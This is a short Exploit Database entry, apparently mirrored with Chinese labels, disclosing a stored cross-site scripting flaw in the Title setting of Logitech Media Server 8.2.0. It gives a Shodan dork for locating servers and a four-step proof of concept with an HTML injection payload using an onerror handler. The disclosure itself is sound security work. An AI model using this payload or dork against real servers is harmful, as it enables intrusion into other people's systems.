Logitech Media Server 8.2.0 – ‘Title’ Cross-Site Scripting (XSS)

• Exploit Database
• 33 阅读

• 作者： Mert Daş
  日期： 2021-10-13
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/50413/

• # Exploit Title: Logitech Media Server 8.2.0 - 'Title' Cross-Site Scripting (XSS)
  # Shodan Dork: Search Logitech Media Server
  # Date: 12.10.2021
  # Exploit Author: Mert Das
  # Vendor Homepage: www.logitech.com
  # Version: 8.2.0
  # Tested on: Windows 10, Linux
  
  POC:
  
  1. Go to Settings / Interface tab
  2. Add payload to Title section
  3. Payload : "><img src=1 onerror=alert(1)>
  4. Alert will popup